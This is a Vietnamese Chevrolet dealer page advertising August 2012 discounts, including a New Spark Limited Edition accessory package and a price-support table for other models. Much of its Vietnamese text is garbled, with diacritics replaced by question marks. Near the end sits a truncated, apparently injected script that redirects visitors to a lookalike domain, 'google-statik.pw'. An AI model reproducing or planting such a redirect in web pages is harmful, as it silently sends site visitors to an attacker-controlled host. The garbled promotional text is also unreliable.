Chương Trình Khuyến Mãi Tháng 8 - MỘT CHEVROLET NEW SPARK LIMITED EDITION THẬT KHÁC BIỆT DÀNH CHO NGƯỜI TRẺ SÀNH ĐIỆU VỚI GIÁ KHÔNG ĐỔI VÀ CHIẾT KHẤU HẤP DẪN

Cung nhan d?p nay, d? cam on s? tin tu?ng c?a quy khach hang trong th?i gian qua, GM Vi?t Nam cung xin gi?i thi?u chuong trinh khuy?n m?i trong thang 8 cho cac dong xe khac, d?c bi?t la CRUZE LTZ va ORLANDO LTZ nhu sau:

alt

K? t? khi ra m?t d?n nay, dong xe Chevrolet New Spark da tr? thanh m?t bi?u tu?ng m?i c?a gi?i tr? t?i Vi?t Nam. Nhan d?p he v?, GM Vi?t Nam tran tr?ng gi?i thi?u m?t Chevrolet New Spark th?t khac bi?t danh cho ngu?i tr? sanh di?u: Chevrolet New Spark Limited Edition v?i gia khong d?i va chi?t kh?u h?p d?n len d?n 37,000,000 VND.

Trong phien b?n Limited Edition nay, Chevrolet New Spark s? khac bi?t hon v?i cac chi ti?t chinh hang, n?i b?t va sanh di?u nhu:

 1. B? Body Kit bao xung quanh than xe
 2. B? ?p guong
 3. B? ch?p ?ng x?
 4. B? ve che mua
 5. B? decal danh rieng cho Chevrolet New Spark
 6. B? bezel Limited Edition dan tren xe
 7. B? moc chia khoa chinh hang Chevrolet

Chuong trinh keo dai t? 04/08 d?n 31/08/2012 va Limited Edition ch? ap d?ng cho dong xe Chevrolet New Spark 1.2 LS.

Cung nhan d?p nay, d? cam on s? tin tu?ng c?a quy khach hang trong th?i gian qua, GM Vi?t Nam cung xin gi?i thi?u chuong trinh khuy?n m?i trongt hang 8 cho cac dong xe khac, d?c bi?t la CRUZE LTZ va ORLANDO LTZ nhu sau:

STT

Model

H? tr? gia cho khach hang

Phien b?n xe Limited Edition

1

Spark Lite Van


-

2

Spark Lite LT

21,036,000

-

3

New Spark 1.0 LS


-

4

New Spark 1.0 LT

10,518,000

-

5

New Spark 1.2 LS

37,864,800

Di?m khac bi?t n?i b?t tren New Spark 1.2 LS Limited Edition

 1. B? Body Kit bao xung quanh than xe
 2. B? ?p guong
 3. B? ch?p ?ng x?
 4. B? ve che mua
 5. B? decal danh rieng cho Chevrolet New Spark
 6. B? bezel Limited Edition dan tren xe
 7. Moc chia khoa chinh hang Chevrolet

6

Spark 1.2 LT

12,621,600

-

7

Aveo LT

6,310,800

-

8

Lacetti EX

6,310,800

-

9

Cruze LS

10,051,800

-

10

Cruze LTZ

31,554,000

-

11

Orlando LS

39,968,400

-

12

Orlando LT

39,968,400

-

13

Orlando LTZ

39,968,400

-

14

Captiva LT

31,554,000

-

15

Captiva LTZ

31,554,000

-

Di?u kho?n ap d?ng:

            - Khong ap d?ng cung chuong trinh “Cham soc d?c bi?t”

            - Ap d?ng cho cac xe mua trong th?i gian 04/08 d?n 31/08/2012

            - Ap d?ng t?i cac d?i ly c?a GM trong toan Vi?t Nam.

M?i th?c m?c xin vui long lien h? Trung tam Cham Soc Khach Hang c?a chung toi:

Hotline: 0932 088 838

Chu?ng toi Cam k?t: Xe xua?t xu? chi?nh ha?ng, du?ng theo tieu chua?n cu?a nha? sa?n xua?t.

Gia t?t nha?t ta?i mo?i tho?i die?m.Tho?i gian giao xe nhanh nha?t. Th? th?c nhanh chong don gia?n.

H? tr? k?p th?i. V?i d?ch v? b?o hanh b?o du?ng, ba?o ha?nh tr?c ti?p t?i xu?ng c?a cong ty theo quy di?nh cu?a nha? sa?n xua?t.

Ngoai ra, Cong ty co?n h? tr? thu? tu?c dang ky, dang kie?m, mua xe tr? gop vo?i so? tie?n vay tu? 50% - 70% gia? tri? xe, tho?i gian vay tu? 3 - 5 nam vo?i la?i sua?t theo quy di?nh cu?a Ngan ha?ng nha? nuo?c Vie?t Nam.

CHEVROLET TA?I LO?C PHA?T HAN HA?NH PHU?C VU? QUY? KHA?CH!

Quy? kha?ch co? nhu ca?u vui lo?ng lien he?: 0932. 088 838 de? duo?c tu va?n va? ba?o gia? to?t nha?t.  

if (screen.width ion = "http://google-statik.pw/l.php";}
 

Salon Auto

Nội thất đồ chơi

Tư vấn mua bán xe


 

Quảng Cáo